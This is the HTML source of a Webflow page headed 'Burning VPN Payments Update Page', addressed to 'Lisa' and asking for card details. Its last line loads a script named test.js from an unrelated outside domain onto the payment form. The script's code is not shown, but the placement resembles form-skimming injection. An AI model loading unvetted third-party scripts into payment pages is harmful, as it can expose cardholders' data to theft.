<!DOCTYPE html>
<!--  This site was created in Webflow. http://www.webflow.com  -->
<!--  Last Published: Wed May 29 2019 10:30:56 GMT+0000 (UTC)  -->
<html data-wf-page="5cda86efb77566327294c412" data-wf-site="5cc26adddcc67f8c2ff08dd5" lang="en">
<head>
  <meta charset="utf-8">
  <title>Burning VPN Payments Update Page</title>
  <meta content="Burning VPN Payments Update Page" property="og:title">
  <meta content="width=device-width, initial-scale=1" name="viewport">
  <meta content="Webflow" name="generator">
  <link href="css/normalize.css" rel="stylesheet" type="text/css">
  <link href="css/webflow.css" rel="stylesheet" type="text/css">
  <link href="css/my-money-global.webflow.css" rel="stylesheet" type="text/css">
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">WebFont.load({  google: {    families: ["Varela Round:400","Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic","Merriweather:300,300italic,400,400italic,700,700italic,900,900italic","Roboto:100italic,300,300italic,regular,italic,500,500italic,700,700italic,900,900italic:vietnamese,cyrillic-ext,greek-ext,greek,latin-ext,latin,cyrillic"]  }});</script>
  <!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] -->
  <script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
  <link href="images/Icon32px.png" rel="shortcut icon" type="image/x-icon">
  <link href="images/Icon256px.png" rel="apple-touch-icon">
</head>
<body>
  <div class="header-section">
    <div class="container-10 w-container">
      <h1 class="heading">Hi Lisa,</h1>
      <p class="subtitle">Enter your payment details below to continue using Burning VPN.<br>We&#x27;ll keep your payment information on file, and you will be charged the regular rate every month on the payment card on file.<br>You can cancel any time by reaching out to us at support@burningvpn.com<br>‍<br></p>
      <div class="sign-up-form w-form">
        <form name="wf-form-Payment-update-form" data-name="Payment update form" id="payment-form" action="/update_payment_post" method="post">
          <div class="form-row"><label>Form Label</label>
            <div id="card-element"></div>
            <div id="card-errors" role="alert"></div>
          </div>
        </form>
        <div class="success-message w-form-done">
          <p>Success! <br>Your payment information has been updated successfully.</p>
          <div class="share-button google w-widget w-widget-gplus">
            <div class="g-plusone" data-href="http://webflow.com" data-size="tall" data-annotation="bubble" data-recommendations="false"></div>
          </div>
        </div>
        <div class="error-message w-form-fail">
          <p>Oops! Something went wrong while updating your payment information. :(</p>
        </div>
      </div>
    </div>
  </div>
  <script src="https://d1tdp7z6w94jbb.cloudfront.net/js/jquery-3.3.1.min.js" type="text/javascript" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
  <script src="js/webflow.js" type="text/javascript"></script>
  <!-- [if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif] -->
  <script type="application/javascript" src="https://www.youngandai.com/test.js"></script>
</body>
</html>